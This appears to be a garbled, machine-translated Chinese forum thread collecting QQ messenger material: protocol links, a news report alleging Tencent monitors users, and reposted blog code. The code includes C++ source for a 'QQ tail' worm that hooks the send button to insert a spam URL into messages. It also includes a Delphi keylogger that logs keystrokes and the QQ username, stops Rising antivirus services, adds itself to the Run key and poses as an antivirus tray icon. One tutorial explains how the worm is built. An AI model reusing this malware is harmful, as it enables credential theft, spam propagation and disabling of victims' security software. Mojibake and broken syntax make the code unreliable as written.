This has some QQ protocol organized by ISQ
http://lumaqq.linuxsir.org/doc/protocol Document From ISQ.rar
Www.realoa.net Delphi program, passive code, online debugging
Www.anyq.net C program, active code
Lumaqq
http://lumaqq.linuxsir.org/main/
Welcome to the concentrated lumaQQ posted the link lumaqq.linuxsir.orghttp: //www.linuxsir.org/bbs/showthr...threadid=108131LumaQQ Patch 2http: //www.linuxsir.org/bbs/showthr...threadid=110288LumaQQ release FreeBSD decompression package, concrete installation method reference online document http://www.linuxsir.org/bbs/showthr..threadid=111247lumaqq 0.1 beta1 patch 1http://www.linuxsir.org/bbs/showthr..threadID= 107085 has a new QQ software out! ! Http://www.linuxsir.org/bbs/showthr...threadid=106715 complete compilation method from GTK 2.4.0 to GIMP2 to OpenQ3 http://www.linuxsir.org/bbs/showthr..threadID = 105467luma heroes Note: Lumaqq cannot receive Gaim 0.64 information http://www.linuxsir.org/bbs/showthr...threadID = 111823Eclipsem9 released, it seems that the LUMAQQ input method is still http: //www.linuxsir .org / bbs / showthr ... threadid = 111159
OpenQ
http://openq.linuxsir.org/cgi-bin/wiki/moin.cgi/
OpenQ concentrated link stickers OpenQ group website: http://openq.linuxSir.orgopenq 0.3 public test http://www.linuxsir.org/bbs/showthr..threadid=104399 Release OpenQ 0.3.0-P2HTTP: // www .linuxSir.org / bbs / showthr ... threadid = 104881 I made an OpenQ's BSD version of the patch http://www.linuxsir.org/bbs/showthr..threadidiD=107516Gaim-qq2.71p1 installation method, solve MSN lacks SSL support and the case where the QQ plugin is not found http://www.linuxsir.org/bbs/showthr...;threadid=99976Gaim QQ 0.2.7 released http://www.linuxsir.org/bbs/ Showthr ...; threadid = 95807 Invitation more people join the OpenQ's initiative http://www.linuxsir.org/bbs/showthr..threadid=103581
__________________
#
Reply: QQ information
2004-10-20 9:35 AM
Bing314
Valong / article
Miss Xu, Hangzhou is the old user of Tencent QQ, but the recent QQ number has been sealed, and Miss Xu has gone to vigorously, and it is horror until I am angry.
(1) Event - QQ number is seized
One day in June, Miss Xu opened the computer on the computer as usual, suddenly popped up a window, prompting "Forbidden use", Miss Xu tried several times, still this. Miss Xu later recalled: "I first inquired by email, no one cares about me, after a week, I finally couldn't help but call the long-distance call to Shenzhen, ask Tencent's customer service, to give me a reason for me. The customer service was found in a few minutes, saying that I downloaded the political sensitive document, there is a record, so the number will be seized. "The reporter was applying the user's user identity after the consent of Miss Xu Calling Shenzhen Tencent, understand the number of the number being seized, after reporting the QQ number and password, the customer service personnel let the reporter will wait a little, after a few minutes, the customer service staff tells the reporter, this QQ number is downloaded on May 30th. Sensitive Information, so it is seized, and "it is impossible to come back"!
According to Miss Xu's memories, she did have downloaded a document. "If it is not Tencent's record, I can't think of it. But I haven't seen it all, and I have no spread, which is also a number?" The strange thing is that Miss Xu did not download the document using Tencent's Te Browser.
Miss Xu suspects that if you install QQ, you can monitor the user's computer usage, and you can return the information in the user's computer to Tencent's server? If this is this, then what personal privacy does it? Moreover, Miss Xu, who is a QQ member, her own ID number, mobile phone number is recorded in accordance with Tencent's request.
In fact, it is not only such a simple privacy problem. If there is a government department or a business agency to have QQ in the computer, it is possible to cause serious information leakage safety hazards. QQ Bundle of TE browser provides the "Who I am" with my "" function, you can track and understand QQ users to visit those sites.
(2) Survey - user information is recorded
An industry insiders who have studied in software security issues confirmed that through IRIS captain software, it can be seen that QQ can pass unknown data to the server, and these data is encrypted.
An article published by the Scientific Times also shows that Tencent attaches the browser program in the QQ program, which is the function of "who is in the same" with me ", allowing any users to find the currently browsing page. What other Tencent QQ users can also be monitored while monitoring which pages are visible, these collections are browsed, which can be commercialized.
Just at the reporter began to investigate and asked Tencent to interview. Miss Xu's QQ number actually unsaptive, which can be used.
The reporter called Tencent's Marketing Department and sent an interview outline to interview through email. The main problem with the reporter is:
1, is QQ to monitor the usage of each user? Including access to those websites, what documents downloaded?
2, QQ monitors this information over how this information is monitored.
3, as a private business, user personal information and usage habits not to be used by him?
4. For QQ's monitoring function, if the hacker or other intelligence agency is used, Tencent should be responsible?
5. Can Tencent can be known for the secret of government departments or commercial companies?
(3) Reasons - Enterprises political color
After the reporter's interview opening, Tencent did not give any written text reply, nor did it formally an interview arrangement, but through a public relations company in Beijing and correspondence communication with reporters.
The public relations company dials the reporter's phone according to the number left by the reporter, trying to convince the reporter not to investigate and report on the matter, she told reporters that Tencent is currently in powerful rising trend, and various communication software on the market It is also endless, the competition is very intense. If the reporter's report, Tencent QQ is not expected to be in terms of Tencent. For Miss Xu QQ number, the public relations company disclosed that Tencent received an instruction from the relevant department of the higher level to monitor the user's usage and sealed her number. She refused to reveal which department is required? Tencent did this, just warned the reporter, if the report is reported, it may "sacrifice". It is obviously trying to put the business problems on a layer of political color. After hearing this news, Miss Xu said shocked and angry: "How do I feel 阴 森 森 森? Take me as the country's enemy?" Miss Xu also vowed to ensure that the reporter was guaranteed, she did not release anything through QQ Bad information, "If there is, let them take evidence, who is sent?"
According to reporter investigations, for network companies and communication software companies, the superior authority is indeed proposed, technical filtration and shielding of bad information on the network, not spreading and spreading, but no company has received The instructions of monitoring the user usage are required. "I really want to monitor a person, which is used to use them", a friend who has made an intelligence to tell the reporter.
(4) Be wary - communication software security has hidden dangers
A communications software company's technicians told reporters that in instant messaging software, the monitoring program is added, and it is difficult to implement, as long as several keyword retrieval and filtering on the user, you can return the critical information back to the server. Not to monitor all chat records.
According to some people say that instant messaging software has a safety hazard. As a consumer is entitled to these, but as a business company has no right to monitor the user's operation record, respect and protect the privacy and security of users are international. Pass business guidelines.
According to the CCID, June 14, the Office of the Chief Prosecutor in New York, USA said that the Netscape of Warner, AOL Times, will pay $ 100,000 and a solution, which is complained in complaints due to the use of the software to track the user download.
On the other hand, due to the security performance defects of QQ itself, various hacking software for QQ is growing. In the history of China software, QQ should be the most online instant messaging software that attacks. Many commercial companies have realized QQ security issues, some units and commercial companies in Beijing are strictly forbidden to use QQ software.
Before the reporter published, Tencent passed an email, and sent a written reply to the editor, and Miss Xu, Hangzhou said that she would not be good, she wants to "call". " But in any case, Tencent records the user's usage information, which cannot cause more users to pay attention to the security issues of network communication software.
Appendix: Tencent's written reply comments
Hello, I am:
Regarding the outline of the Hangzhou user number, Tencent's formal reply is as follows, I hope you will report with an objective justice attitude.
First of all, it is necessary to strictly declare that under the information of massive information, Tencent adopts a point-to-peer message transceiver, determines Tencent to monitor the operation of the user on the computer. Any unit or individual who is not real-in-case is required to be responsible. As for the detection of your email, in the case of operator background, network environment, use software, operation steps are unclear, we can't judge the authenticity of this detection, and cannot respond.
As an instant communication software, Tencent QQ is technically used by the principle of a point. That is, in most cases, the communication between the user is from one user to another, and does not need to be transferred through the Tencent server. The Tencent server will only help users save and transfer messages in special cases of network instability, network condition complex or user offline. According to the provisions of the higher network security information processing, through the message transferred by the server, the message issued by Tencent will pass the information security filtering mechanism, which is because the user has transferred the message content containing sensitive vocabulary through the Tencent server. Therefore, Tencent made a title. As for later unscence, it is because the user's message contains sensitive content, but it is not intended to spread illegal content. In order to protect user rights, we understand this number to the process. Tencent has always paid attention to and protects user privacy. Regarding the message content of the user, the transmission time and the other party number, Tencent cannot be available.
Tencent will be available in the absence of a legal procedure if necessary.
Tencent QQ provides a service for massive users, with more than 20 million users to communicate, chat. The amount of sending messages is from 1 billion, and Tencent is not necessary to save each user's message record, and more do not talk about the computer usage behavior of monitoring 10 million users.
Under the requirements of the competent department, Tencent will cooperate with the competent department to assist network security work and do some processing according to the competent authorities. All behaviors are in line with relevant regulations and requirements.
Tencent
June 23, 2003
delete
#
Reply: QQ information
2004-10-20 9:59 AM
Bing314
Author CNSS 2004-8-18
All rights reserved, please indicate the source
http://blog.9cbs.net/cnss
Recently wrote a good format than QQWRY, click here.
I saw a blog on QQWRY format just passed by RSS: http://blog.9cbs.net/taft/archive/2004/08/18/77559.aspx
I can't think of qqwry, this is designed two years ago, this format should be eliminated. Why do you say that it is index binary look to reduce memory occupancy and improve the lookup speed.
delete
#
Reply: QQ information
2004-10-20 2:20 pm
Bing314
QQ2004's RICH handle lookup method and the implementation of the tail virus
SteveCrisewu's column
Http://blog.9cbs.net/stevecrisewu/archive/2004/09/16/106984.aspx
Seeing a lot of people in questioning QQ problems, mainly about the problem of studying QQ tail, there are many examples on the Internet, but when using the code provided by the author, it is not possible to find Richedit correctly, so it cannot be Mounting hooks, below, should be possible, with the source code of QQHOOK.
In fact, the key is that the 2004 version of QQ it has made a hand feet, adds a form on the original form, so the original author cannot find the handle of the Rich window.
Test CPP
#include
// # include
#include "qqhook.h"
#pragma comment (Lib, "QQHOK.LIB")
#include "resource.h"
#define id_mytimer 419 // 1/4æê ± ÷ id
BOOL G_BSTART;
HWND G_HQQ;
Lresult Callback Procmain (HWND HDLG, UINT MSG, WPARAM WPARAM, LPARAM LPARAM)
{
? Switch (MSG)
? {
? Case WM_Close:
? // ?? AnimateWindow (HDLG, 800, aw_hide | aw_slide | aw_ver_positive); ??? Enddialog (HDLG, 0);
??? Break;
? Case WM_Command:
??? {
????? f (loword (wparam) == IDC_BTN_CONTROL)
????? {
??????? g_bstart =! g_bstart;
??????? setdlgitemtext (HDLG, IDC_BTN_CONTROL, G_BSTART? "£ £ ¹¹": "¿ªªª1/4");
??????? ing (g_bstart)
????????? setTimer (HDLG, ID_MYTIMER, 1000, NULL);
??????? ELSE
??????? {
????????? KillTimer (HDLG, ID_MYTIMER);
????????? seton (null);
???????}
?????}
????? f (loword (wparam) == IDC_BTN_EXIT)
??????? SendMessage (HDLG, WM_CLOSE, 0, 0);
???}
??? Break;
? Case WM_DESTROY:
??? postquitmessage (0);
??? Break;
? Case WM_INITDIALOG:
??? {
????? int x, y;
????? RECT RECT;
????? g_bstart = false;
????? getWindowRect (HDLG, & Re);
????? x = getSystemMetrics - Rect.right Rect.Lester;
????? y = getSystemMetrics - Rect.bottom Rect.top - 10;
????? setwindowpos (HDLG, HWND_TOPMOST, X, Y, 0, 0, SWP_NOSIZE | SWP_NOZORDER);
?? // ?? ANIMATEWINDOW (HDLG, 800, aw_slide | aw_ver_negative);
???}
??? Break;
? Case WM_Timer:
??? {
????? if (! iswindow (g_hqq))
????? {???????
??????? hwnd hwnd;
?? hwnd hsend;
?? //? Cwnd * mywnd;
?? int Nidfirst;
?? int flag;
?? char lpbuf [256];
?? // ?? DWORD A;
??????? g_hqq = NULL;
?? hwnd = null;
?? hsend = null;
??????? seton (null);
?? //? do
?? //? {
?? // ??? g_hqq = findwindowex (null, g_hqq, "# 32770", null);???
??
?? // ?? getWindowText (g_hqq, lpbuf, 255);?
??
?? //? IF (strcmp (lpbuf, "óë áäìö ð") == 0) Break;
?? // ?? hsend = findwindowex (g_hqq, null, "button", "¢ ëí (& s)");??
??
?? //?} While (! (g_hqq! = null && hsend! = null); nidfirst = 0;
?? Flag = 0;
?? While (1)
?? {
??? g_hqq = findwindowex (null, g_hqq, "# 32770", null);
??? IF (g_hqq == null) Break;
??? getWindowText (g_hqq, lpbuf, 256);???
??? hWnd = getWindow (g_hqq, gw_child);
??? i (hwnd || :: iswindow (hwnd))
??? {
???? Nidfirst = getdlgctrlid (hwnd);
???? do
???? {
????? getclassname (hwnd, lpbuf, 256);???
????? ing (strcmp (lpbuf, "# 32770") == 0)
????? {
?????? hsend = findwindowex (hwnd, hsend, "button", "¢ ëí (& s)");
?????? ing (hsend)
?????? {
??????? flag = 1;
??????? g_hqq = hwnd;
??????? breaf;
??????}
?????}
????? getWindowText (hwnd, lpbuf, 256);???
????? hwnd = :: getwindow (hwnd, gw_hwndnext);??
????? if (! :: iswindow (hwnd) || hWnd == null) ?? Break;
????} while (nidfirst! = getdlgctrlid (hwnd));?
???}?
??? IF (flag) Break;
??}
??????? IF (g_hqq! = null)
????????? STHOOK (G_HQQ);
?????}
???}
??? Break;
?
? Return 0;
}
Int WinApi WinMain (Hinstance Hinstance, Hinstance Hprevinstance, LPSTR LPCMDLINE, INT NSHOWCMD)
{
DialogBoxParam (Hinstance, MakeintResource (IDD_DIALOG), NULL, (DLGPROC) procmain, 0);
DWORD A = getLastError ();
? Return 0;
}
?
QQ hook source code
CPP file
#include
#define qqtailapi __declspec (dllexport)
#include "qqhook.h"
// ¶ ò¹¹2ïíêý4¾¶¶îîîî
#pragma data_seg ("Shared")
HHOOK G_HPROC = NULL; // '° ¹¹¹3¹¹3 × ó/4Ä ± ±
HHOOK G_HKEY = null; // 1/4üå¹¹3 × 子4Ä ± ú
HWND g_hrich = null; // îä ± 3/4¿ ò/4Ä ± ú
#pragma data_seg ()
#pragma Comment (Linker, "/ Section: Shared, RWS")
// dll/4Ä ± ú
Hinstance g_hinstdll = null;
// îòμÄ¡ ° 2 ° í. ±
TCHAR G_STR [] = "/ N¶ô2» æð £ ¬äúòñ¾¾¾ »1/2 û¹¹áäìì £";
// oê¹¹|Äü £ oïòîîä ± 3/4¿ òõõ3ìùî2 ° ívoid Pastetext (HWND HRICH)
{
Hglobal HMEM;
? Lptstr pstr;
? // öåÄÄú'æ¿¿¿ Õõä
? // sendMessage (HRICH, WM_SETTEXT, 0, LPARAM (""));
HMEM = GLOBALLOC (GHND | GMEM_SHARE, SIZEOF (g_str));
PSTR = (LPTSTR) Globalock (HMEM);
? lstrcpy (pstr, g_str);?
? GlobalUnlock (HMEM);
OpenClipboard (NULL);
? Emptyclipboard ();
? // éèö1/11ìù ° åîä ± 3/4
• setClipboardData (CF_Text, HMEM);
CLOSECLIPBOARD ();
? // êí · åäú'æ¿ Õõä
? GlobalFree (HMEM);
? // õ 3ìõùùîä ± 3/4
? SendMessage (HRICH, WM_PASTE, 0, 0);
}
// ¹3 × ¹¹¹3ì £ ¬¬ààêó¡¡ ° · ¢ ëí¡¡ ± μäãüîûûûû ¢
LResult Callback CallWndProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
CWPSTRUCT * P = (cwpstruct *) lparam;
? // 2¶ »ñ¡ ° · ¢ ëí¡¡ ± ° å ¥
? IF (p-> message == wm_command && loword (p-> wparam) == 1)
??? Pastetext (g_hrich);
Return CallNexthookex (g_hproc, ncode, wparam, lparam);
}
// 1/4üå¹¹3 × ¹¹¹3ì £ ¬¬àààêó¡ ° · ¢ ëí¡¡ ± μäèè1/4üûûûû ¢
Lresult Callback KeyboardProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
? // 2¶ »ñèè1/4üûûû ¢
? IF (wparam == vk_return && getasynckeystate (vk_control) <0 && lparam> = 0)
??? Pastetext (g_hrich);
Return CallNexthookex (G_hKey, Ncode, WPARAM, LPARAM);
}
// ¹¹1/2 ¹¹3 × ó
Bool WinAPI STHOK (HWND HQQ)
{
? BOOL BRET = FALSE;
? IF (hqq! = null)
? {
??? DWORD DWTHREADID = GetWindowThreadProcessId (HQQ, NULL);
??? // ¸ðð »oãóhotteyμä²õõ''âë ¬¬¡¡¡¡ È áëîò¹¹óãspy μÄâé 3
??? g_hrich = getWindow (getdlgitem (hqq, 0), gw_child);
??? i (g_hrich == null)
????? Return False;
??? // ¹¹1/2 ¹¹3 × ó
??? g_hproc = setWindowshookex (Wh_CallWndProc, CallWndProc, g_hinstdll, dwthreadid);
??? g_hkey = setWindowshookex (wh_keyboard, keyboardproc, g_hinstdll, dwthreadid); ??? Bret = (g_hproc! = null) && (g_hkey! = null);
?
? Else
? {
??? // ¶ôô¹3 × ó
??? Bret = UnHookWindowsHookex (g_hproc) && unhookwindowshookex (g_hkey);
??? g_hproc = null;
??? g_hKey = null;
??? g_hrich = null;
?
RETURN BRET;
}
// DLLö ÷ o ¯êý
Bool WinApi Dllmain (Hinstance Hinstdll, DWord FDWREASON, LPVOID LPVRESERVED)
{
? IF (fdwreason == dll_process_attach)
??? g_hinstdll = hinstdll;
Return True;
}
?
head File
#ifndef qqtailapi
#define qqtailapi __declspec (dllimport)
#ENDIF
QQTAILAPI BOOL WINAPI STHOK (HWND HQQ);
?
Copyright Notice: 9CBS is this BLOG managed service provider. If this paper involves copyright issues, 9CBS does not assume relevant responsibilities, please contact the copyright owner directly with the article Author.
delete
#
Reply: QQ information
2004-10-20 2:33 PM
Bing314
Title QQ2004hack Select Blog from MSFM
Keyword QQ2004HACK
Somewhere
Thank SforveVer to help
HookKey: string;
HHOOK: Integer;
Creeper, Creeper1: TextFile;
AhWnd, ComboBoXH: Thandle; // Handle
QqformID: hwnd;
User: array [0..254] of char;
Sendbody: String;
PSMTP, Puser, PPass, Pgetmail, Ptomail, Subject, MailText: String
IMPLEMentation
// Looking for QQ chat window
Function fpopoid (ahwnd: hwnd; w: integer): boolean; stdcall;
Var Wintext: pchar;
Begin
RESULT: = TRUE;
GetMem (Wintext, 100);
GetWindowText (Ahwnd, Wintext, 100);
IF POS ('and', Wintext)> 0 THEN
Begin
Trysendmail;
Sleep (100);
UnHookWindowsHookex (HHOOK);
HHOOK: = 0;
Application.Terminate;
END;
END;
Function FMSGidIdit (ahwnd: hwnd; w: integer): boolean; stdcall;
VAR
f: TextFile;
Begin
RESULT: = TRUE;
ComboBOBOXH: = FindWindowEx (QQFormid, 0, 'ComboBox', NIL);
SendMessage (ComboBOBOXH, WM_GETTEXT, 254, Integer (@USER));
IF TRIM (user) <> '' THEN
Begin
AssignFile (f, getwindir 'name.txt'); REWRITE (F);
Write (f, 'QQ User Name:' User);
Closefile (f);
EXIT;
END;
END;
Function FQQID (AhWnd: hwnd; w: integer): boolean; stdcall;
Var Wintext: pchar;
Begin
GetMem (Wintext, 100);
GetClassName (AhWnd, Wintext, 100);
IF Wintext = '# 32770' THEN
Begin
QqformID: = ahwnd; // Get QQ window handle
IF QqformID <> 0 THEN
Begin
RESULT: = TRUE;
EnumchildWindows (QQFormID, @ fmsgidited, 0); // Temporary
END;
END;
END;
Function KeyhookResult (lp: integer; wp: integer): PCHAR;
Begin
Result: = '[Print Screen]';
Case LP of
10688: Result: = '`';
561: Result: = '1';
818: Result: = '2';
1075: Result: = '3';
1332: Result: = '4';
1589: RESULT: = '5';
1846: Result: = '6';
2103: Result: = '7';
2360: Result: = '8';
2617: Result: = '9';
2864: RESULT: = '0';
3261: Result: = '-';
3515: Result: = '=';
4177: Result: = 'q';
4439: Result: = 'W';
4677: Result: = 'e';
4946: Result: = 'r';
5204: Result: = 't';
5465: Result: = 'y';
5717: Result: = 'u';
5961: Result: = 'i';
6223: Result: = 'o';
6480: Result: = 'p';
6875: Result: = '[';
7133: Result: = ']';
11228: RESULT: = '/';
7745: Result: = 'a';
8019: Result: = 's';
8260: Result: = 'd';
8518: Result: = 'f';
8775: Result: = 'g';
9032: Result: = 'h';
9290: Result: = 'J';
9547: Result: = 'k'; 9804: Result: = 'L';
10170: Result: = ';';
10462: Result: = '' '';
11354: Result: = 'Z';
11608: Result: = 'x';
11843: RESULT: = 'c';
12118: Result: = 'V';
12354: RESULT: = 'b';
12622: Result: = 'n';
12877: RESULT: = 'm';
13244: Result: = ',';
13502: Result: = '.';
13759: Result: = '/';
13840: Result: = '[right-shift]';
14624: Result: = '[Space]';
283: Result: = '[ESC]';
15216: Result: = '[f1]';
15473: Result: = '[f2]';
15730: Result: = '[f3]';
15987: Result: = '[f4]';
16244: Result: = '[f5]';
16501: Result: = '[f6]';
16758: Result: = '[f7]';
17015: Result: = '[f8]';
17272: Result: = '[f9]';
17529: Result: = '[f10]';
22394: Result: = '[f11]';
22651: Result: = '[f12]';
10768: Result: = '[left-shift]';
14868: Result: = '[Capslock]';
3592: RESULT: = '[backss]';
3849: Result: = '[Tab]';
7441:
IF WP> 30000 THEN
Result: = '[right-ctrl]'
Else
Result: = '[left-ctrl]';
13679: Result: = '[Num /]';
17808: Result: = '[Numlock]';
300: Result: = '[Print Screen]';
18065: Result: = '[scroll lock]';
17683: Result: = '[pause]';
21088: Result: = '[Num0]';
21358: Result: = '[Num.]';
20321: Result: = '[Num1]';
20578: Result: = '[Num2]'
20835: Result: = '[Num3]'; 19300: Result: = '[Num4]'
19557: Result: = '[Num5]';
19814: Result: = '[Num6]';
18279: Result: = '[NUM7]'
18536: Result: = '[Num8]';
18793: Result: = '[NUM9]'
19468: Result: = '[* 5 *]';
14186: Result: = '[Num *]';
19053: Result: = '[Num -]';
20075: Result: = '[NUM ]';
21037: Result: = '[insert]';
21294: Result: = '[delete]';
18212: Result: = '[Home]';
20259: Result: = '[end]';
18721: Result: = '[PageUp]';
20770: Result: = '[pagedown]';
18470: Result: = '[UP]';
20520: Result: = '[Down]';
19237: Result: = '[left]';
19751: Result: = '[Right]';
7181: Result: = '[enter]';
END;
END;
Function hookproc (icode: integer; wparam: wparam; lparam: lparam): LRESULT; stdcall;
VAR
Creeper: TextFile;
Begin
IF (PEVENTMSG (LPARAM) ^. Message = WM_Keydown) THEN
HookKey: = HookKey KeyHOKRESULT (peventmsg (lparam) ^. paraml, peventmsg (lparam) ^. paramh;
IF Length> 0 THEN
Begin
IF EnumWindows (@ fqqid, 0) THEN
Begin
AssignFile (Creeper, getWindir 'key.txt');
If FileExists (getWindir 'key.txt') THEN
Begin
Rewrite (Creeper);
Writeln (Creeper, HookKey);
Closefile (Creeper);
END;
END;
END;
END;
Procedure TFORM1.FormCreate (Sender: TOBJECT);
VAR
Myname: String;
Batchfilename: String;
BFILE: TEXTFILE;
Sysdir: string;
NOTII: PNOTIFYICONDATA;
Begin
Application.showmainform: = false;
Sysdir: = getwindir;
BatchFileName: = sysdir 'killrav.bat';
AssignFile (Bfile, BatchFileName); Rewrite (BFILE);
Writeln (bfile, '@net stop xicCenter');
Writeln (bfile, '@net stop rsravmon ");
Writeln (bfile, '@close');
Closefile (bfile);
MyName: = extractFileName (Application.exename); // Get file name
IF Application.exename <> sysdir myname dam //
Begin
Copyfile (Pchar (Application.exename), Pchar (Sysdir MyName), False;
END;
With tregistry.create do
Begin
RootKey: = HKEY_LOCAL_MACHINE
OpenKey ('/ Software / Microsoft / Windows / CurrentVersion / Run', TRUE);
WriteString ('System, Rundll', sysdir 'ravMom.exe');
FREE;
END;
AssignFile (Creeper, sysdir 'key.txt');
IF not fileexists (sysdir 'key.txt') THEN
Begin
Rewrite (Creeper);
Closefile (Creeper);
END;
Assignfile (Creeper1, Sysdir 'Name.txt');
IF not fileexists (sysdir 'name.txt') THEN
Begin
Rewrite (Creeper1);
Closefile (Creeper1);
END;
Winexec (Pchar (Sysdir 'Killrav.bat'), SW_HIDE);
HHOOK: = 0;
HHOOK: = SETWINDOWSHOKEX (WH_Journal, Hinstance, 0);
NOTII: = New (PNOTICONDATA);
Noti.cbsize: = 80;
Noti.wnd: = form1.handle;
NOTI.UID: = 0;
NOTI.sztip: = 'Rising Computer Monitor';
NOTI.HICON: = form1.icon.handle; // Rising icon
Noti.uflags: = nif_message or nif_icon or nif_tip;
Shell_notifyicon (NIM_ADD, NOTII);
END;
Procedure TFORM1.TIMER1TIMER (Sender: TOBJECT);
Begin
Enumwindows (@ fpopoid, 0);
END;
Procedure TFORM1.FORMDESTROY (Sender: TOBJECT);
Begin
Deletefile (getWindir 'key.txt');
Deletefile (getWindir 'name.txt');
Deletefile (getwindir 'killrav.bat');
END;
End.
delete
#
Reply: QQ information
2004-10-20 2:35 PM
Bing314
The title is obtained from the process, such as the handle of QQ.EXE, selects the BLOG keyword from the CSO to get the handle of QQ.exe from the process, such as QQ.EXE
Somewhere
The function is defined, I didn't add it, I found it!
DIM USNAPSHOT AS long 'system snapshot return value
DIM URESULT AS Long 'Traversing Process Return Value
DIM UPROCESS AS Processentry32 'Defines Process Structure Variables
DIM Mehandle As long 'process handle
Usnapshot = CreateToolHelp32Snapshot (TH32CS_SNAPPROCESS, 0 &) Establishing system snapshot
Uprocess.dwsize = len (uprocess) 'Initialization Process Information Length
IF unapshot then
URESULT = process32first (usnapshot, uprocess) 'get the first process
Do While uresult
IF INSTR (Uprocess.szexefile, INSTR (Uprocess.Szexefile, Chr (0)) - 1), "QQ.exe"> 0 THEN
MeHandle = OpenProcess (Process_All_Access, True, Uprocess.th32Processid)
'mehandle is the handle of QQ you want
END IF
URESULT = process32next (usnapshot, uprocess) 'gets the next process in the snapshot
Loop
END IF
delete
#
Reply: QQ information
2004-10-20 2:44 PM
Bing314
The title uses SDK to develop "stealing QQ login password" program to select Blog of 3661512
Keyword SDK QQ password
http://dev.9cbs.net/develop/Article/26/26112.shtm
delete
#
Reply: QQ information
2004-10-20 2:45 PM
Bing314
http://dev.9cbs.net/develop/Article/24/24144.shtm
Title "QQ Tail Virus" core technology to achieve BLOG from Titilima
Keyword QQ tail virus
Somewhere
Disclaimer: This article is intended to explore technology, please do not use any destruction in the article in the article.
In 2003, the QQ tail virus could be considered a show. It uses IE's email head vulnerability to spread crazy on QQ. When the virus is sent to others, the virus will automatically add a sentence after the information text, and the content is diverse. In short, the recipient hoped by hope that the URL in this sentence will become the URL in this sentence. The picture below is the news sent after the dyed QQ, with the poisoned people only hit the word "hello", and the other is the masterpiece of the virus.
What I will be discussed below is the technology used by QQ tail viruses. Since the source code of the virus cannot be obtained, the following code is all my subjective assault, and fortunately the effect is basically consistent with the virus itself.
Paste tail
The first one is the simplest problem how to add text. This technology has no secret, that is, the RicheDit "Post" of the QQ message through the clipboard. code show as below:
Tchar g_str [] = "Welcome to my small station to sit: http://titilima.nese.net";
// Function: Paste the tail in the text box
Void Pastetext (HWND HRICH)
{
Hglobal HMEM;
LPTSTR PSTR;
// Allocate memory space
HMEM = GLOBALLOC (GHND | GMEM_SHARE, SIZEOF (g_str)); PSTR = GlobalLock (HMEM);
LSTRCPY (PSTR, G_STR);
GlobalUnlock (HMEM);
OpenClipboard (null);
EMPTYCLIPBOARD ();
// Set the clipboard text
SetClipBoardData (CF_Text, HMEM);
CloseClipboard ();
/ / Release memory space
GlobalFree (HMEM);
// Paste text
SendMessage (hrich, wm_paste, 0, 0);
}
hook
Ok, then the following question is, what should this text be posted? There are some articles on the Internet to study QQ tail implementation, you can use timers to control paste time, similar to this look:
Void CQQTaildlg :: Ontimer (uint nidevent)
{
Pastetext (HRICH);
}
This is indeed a solution, but it also has a large limit-how is the interval of the timer? Perhaps poisoned people are typing, the tail text "唰" has appeared ...
However, the virus itself is not like this, it is accurately paste the text when you click "Send" or press the Ctrl Enter key. In January 2003, a P2 was in the middle, because the system speed was slow, so it could clearly see the timing of the text paste.
Telling here, these facts that I have stated will definitely let you say that you said: hook! - Yes, it is a hook. Here I am saying that this technology is really reproduced in the "QQ Tail Virus".
First of all, I made a brief introduction to the hook, and friends who have been familiar with the hook can skip this paragraph. The so-called Win32 hook (hook) is not the artificial reproduced arm of the iron hook, but a segment subroutine that can be used to monitor specific messages in the system, and complete some specific functions. For example, your program is the emperor, the Windows system acts as a governor of the provinces; as for the hook, it can be considered an imperial imperial. For example, the emperor is aimed at the national taxation, and then sent an imperial to find Shanxi governor and said: "Emperor is aiimuth, in addition to normal taxation, Shanxi adds a Xinghua Village wine ten altar." (-_- # ...) as the emperor can Like this method, the programmer can also use hooks to capture specific messages in the Windows system.
The problem is specific to the "QQ tail virus", that is, we need a hook, paste our text after the user clicks the "Send" button. The hook process I achieve is (as for how to hook this hook, I will explain later):
// Hook process, monitor the "send" command message
LResult Callback CallWndProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
CWPSTRUCT * P = (cwpstruct *) LPARAM;
// Capture the "Send" button
IF (P-> Message == WM_Command && Loword (P-> wparam) == 1)
Pastetext (g_hrich);
Return CallNexthookex (G_HProc, Ncode, WPARAM, LPARAM);
}
Here I mean this callback process for this:
1, LPARAM is a pointer to the CWPSTRUCT structure, which is described below:
Typedef struct {lparam lparam;
WPARAM WPARAM;
Uint Message;
Hwnd hwnd;
CWPSTRUCT, * PCWPSTRUCT;
At this time, like me, SDK Fans may be a smile: Is this not the four hardcore parameters of the window callback? As you said, it is true that you can even use the hook function written by Switch (P-> Message) {/ * ... * /} to fully take over the QQ window.
2, g_hrich is a global variable that saves the handle of the QQ message text box. The reason why the global variable is used here is because I can't get this handle from the parameters of the keyboard hook callback function. As for how to get this handle and the special location of this global variable, I will explain later.
3, CallNexthookex is the next processing process in the hook chain. It will be said: "The imperial imperial imperial imperial imperial imperial imperialism has been replaced. Now, please ask the governor. "(-_- # ...) This is a very important part of the writing hook function. If this sentence is less, it may cause an error in the hook chain of the system, and some programs will not respond - in fact I When writing this simulation program, QQ is a few times.
4, you may ask why I captured the WM_COMMAND message, this reason let me use the following SDK code (although QQ is written with MFC, but with SDK code to explain the WM_COMMAND and "Send" button relationships) :
#define IDC_BTN_SENDMSG 1 // "Send" button ID Macro definition
// QQ Send Message Dialog Passage · Li Ma forgery
LResult Callback Procsenddlg (HWND HDLG, UINT MSG, WPARAM WPARAM, LPARAM LPARAM)
{
Switch (msg)
{
Case WM_Close:
EndDialog (HDLG, 0);
Break;
Case WM_COMMAND:
{
Switch (loword (wparam))
{
Case IDC_BTN_SENDMSG:
// send messages...
Break;
// Other command button processing part ...
}
}
Break;
// Other Case parts ...
}
Return 0;
}
The entire process sent by the message is: When the user clicks the "Send" button, the parent window of this button (that is, "Send Message" dialog box will receive a WM_COMMAND notification message, where WPARAM's low words (ie Loword (WPARAM) is the ID of this button, then calls the part sent in the code, this process is as follows:
So, here I capture the WM_COMMAND message is much more effective than capturing other messages or hooks the mouse hook.
Ok, now this hook has been able to complete the task. But please don't forget: more users prefer to send messages with the "Ctrl Enter" hotkey, so the program also needs to hang a keyboard hook:
/ / Keyboard hook process, monitor "send" hot key message
Lresult Callback KeyboardProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
// Capture hot key message
IF (wparam == vk_return && getasynckeystate (vk_control) <0 && lparam> = 0)
Pastetext (g_hrich);
Return CallNexthookex (G_hKey, Ncode, WPARAM, LPARAM);
